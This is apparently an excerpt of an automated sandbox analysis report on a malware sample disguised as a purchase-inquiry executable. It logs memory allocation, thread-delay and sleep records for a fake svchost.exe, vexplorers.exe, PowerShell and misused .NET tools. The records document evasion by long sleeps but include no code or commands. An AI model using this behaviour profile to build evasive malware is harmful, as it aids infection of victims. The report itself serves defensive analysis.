                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 28EF1FA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1090000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2BF0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2960000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 24F76540000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 24F77FA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 10C0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 2C80000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 4C80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMemory allocated: FF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMemory allocated: 2A60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMemory allocated: 4A60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMemory allocated: 12F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMemory allocated: 2D00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMemory allocated: 2AB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595498
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595384
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594271
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594126
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593856
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593275
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592584
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 587093
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599647
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599293
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599052
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598935
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593306
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593178
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598774
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593873
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599838
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599709
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599567
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599429
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599216
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599023
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598717
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7243Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2352Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4952
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4749
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8219
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1119
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8102
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1604
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9108
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 6495
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3120
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWindow / User API: threadDelayed 6268
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWindow / User API: threadDelayed 3487
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe TID: 7584Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep count: 41 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -37815825351104557s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7624Thread sleep count: 4952 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -599594s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -599453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595703s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595498s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595384s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7624Thread sleep count: 4749 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595281s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595016s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594687s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594530s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594271s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -594126s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -593984s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -593856s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -593275s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -592797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -592584s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99871s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99609s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99484s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99336s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99087s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98281s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97299s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97138s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -96763s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -96636s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -96524s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -96415s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -95248s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -95140s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -94989s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -94859s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -94749s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -94640s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -587093s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99782s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99657s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99532s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99407s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99227s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -99016s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98782s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98657s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98532s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98380s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98251s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -98126s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97980s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97874s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97680s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -97376s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep count: 40 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -36893488147419080s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6024Thread sleep count: 8102 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599765s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6024Thread sleep count: 1604 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599647s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599532s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599407s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599293s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599172s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -599052s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -598935s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -598813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -598688s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -598563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99855s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99542s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99413s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99263s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99139s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99029s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98907s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98688s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98313s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98077s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97965s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97850s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97731s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97614s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97490s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97350s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97184s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -97068s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96938s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96823s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96546s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96385s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96252s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96120s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -96000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95872s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95759s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95651s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95528s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95407s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95297s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -95183s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -94986s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -593306s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -593178s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99860s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99719s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99555s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99448s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -99094s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98984s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2756Thread sleep time: -98875s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8248Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep count: 33 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -30437127721620741s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8376Thread sleep count: 6495 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -599890s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -599704s >= -30000s
